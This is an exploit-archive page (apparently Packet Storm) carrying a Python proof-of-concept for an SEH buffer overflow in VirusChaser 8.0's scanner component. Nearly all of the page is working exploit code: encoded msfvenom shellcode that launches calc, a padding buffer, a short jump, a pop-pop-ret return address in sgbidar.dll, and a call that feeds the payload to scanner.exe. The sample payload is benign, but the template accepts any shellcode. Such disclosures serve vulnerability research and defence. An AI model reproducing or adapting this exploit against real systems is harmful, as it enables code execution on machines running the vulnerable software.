what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VirusChaser 8.0 Buffer Overflow

VirusChaser 8.0 Buffer Overflow
Posted Apr 17, 2017
Authored by 0x41Li

VirusChaser version 8.0 SEH buffer overflow exploit.

tags | exploit, overflow
SHA-256 | 55d4edfc5e560528047e28f4aa656ddf9ae557f65bf055d9001a301986a25b69

VirusChaser 8.0 Buffer Overflow

Change Mirror Download
# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow
# Date: 14 April 2017
# Exploit Author: 0x41Li (0x41Li.D@gmail.com)
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Tested on: Windows 7 (Universal)

import os
from struct import pack

## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b '\x00\x0d\x0a\x09\x22' -f c # x86/shikata_ga_nai succeeded with size 216 ## BADCHARS = \x00\x0d\x0a\x09 AVOIDED = \x22 = " (Cut the buffer)
shellcode= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
"\xae\xc2\x28\x4b\x32\x05")

junk = "A"*688
jmp ="\xeb\x0b\x41\x41" ## JMP 0B
ret = pack('<L',0x10010c81) #pop ECX #pop ESI #RET [sgbidar.dll] (magic addr)
nop = "\x90"*24
payload = junk + jmp + ret + nop + shellcode
print payload
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + payload + "\"")

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    18 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    31 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close